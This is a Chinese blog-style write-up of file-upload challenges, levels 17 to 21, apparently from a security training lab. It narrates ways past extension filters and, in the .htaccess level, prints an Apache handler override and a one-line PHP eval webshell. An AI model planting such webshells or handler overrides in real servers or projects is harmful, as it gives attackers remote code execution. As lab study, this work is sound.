说到底就是上传shell,各种方法绕过
第十七关 文件上传(前端拦截)
进入页面直接上传,发现只能传图片
查看源码:
ok,直接使用bp抓包进行更改
先写入木马,保存为一个图片,抓包上传之后在进行更改:
成功!!!
第十八关 文件上传(解析漏洞)
emmm,和上一关一样的页面,上传php不成功,图片才能成功,
而且改了后缀名会弹窗提示error
后面进行各种花里胡哨的绕过
后缀名都尝试一下,发现只有jpg、png、gif为后缀的文件能够上传成功
其他均为error,估摸着就是后缀名白名单过滤,,,,
尝试使用%00截断,结果还是不成功,
后面又想试试文件名长度,结果还是不行,只能查看源码了:
果然是白名单过滤,而且如果你使用%00截断,比如pm.php%00.jpg,他截取的后缀就是php还是过不了,后来尝试了很久,还是绕过去了,使用汉字进行截断???
我第一次见识到还能用汉字绕过,,,,,可能是因为编码的原因吧!!!
怎么说呢,还是见识少了,敲~~,总之,到这里算是成功绕过了~~
第十九关 文件上传(畸形文件)
打开页面,一样的页面,直接上传
照样是只能长传图片,我们改为php可以很明显发现:
后缀已经被过滤了,ok
这个简单多了嘛,直接双写绕过就行:
ok,问题解决,成功绕过~
第二十关 文件上传(截断上传)
这个就不多了,就是与第十八关 文件上传(解析漏洞)一摸一样
直接汉字截取就可以了:
成功绕过~
第二十一关 文件上传(htaccess)
首先,这个题目存在问题~
图片无论怎么样都无法上传,,,估摸着是作者的代码写错了,我们进行修改一下:
修改成如上图的代码,图片就能够成功上传成功了,关于路径的提示我也已经加上去了~
方便我们了解,毕竟这不是实战,啊哈哈哈哈哈
既然上传问题解决了,那我们现在就开始进行下一步了!!!
首先来了解一下htaccess上传漏洞是啥~~
首先要明白什么是htaccess文件,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
既然功能如此强大,改变文件扩展名,有点东西啊,直接利用即可
第一种方法:
<FilesMatch "biabia">
SetHandler application/x-httpd-php
</FilesMatch>
#biabia文件内容
phpinfo();
当你访问biabia文件时,会解析成php文件,这样就会执行phpinfo()
同理写入木马就能菜刀连接
第二种方法:
AddType application/x-httpd-php .jpg
#name.jpg内容
<?php eval($_GET['c']);?>
然后绕了半天,发现他的黑名单里面有htaccess,这玩蛇
直接把黑名单里的删除了
其实自己尝试了很久没能绕过黑名单,,,,,因为他这里加了很多的限制
双写::$DATA也没用,因为全部变小写了,而且%00截断也没用,过滤了空格
反正是验证.htaccess的,就删除直接来吧,上传.htaccess成功
然后上传biabia文件,直接访问:
成功,突然发现好菜啊,白名单和黑名单都绕过不了
只能想到%00截断,,,,,
要不是字符编码的原因我估摸着那两关可能过不去,,,
唉!!!
650
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
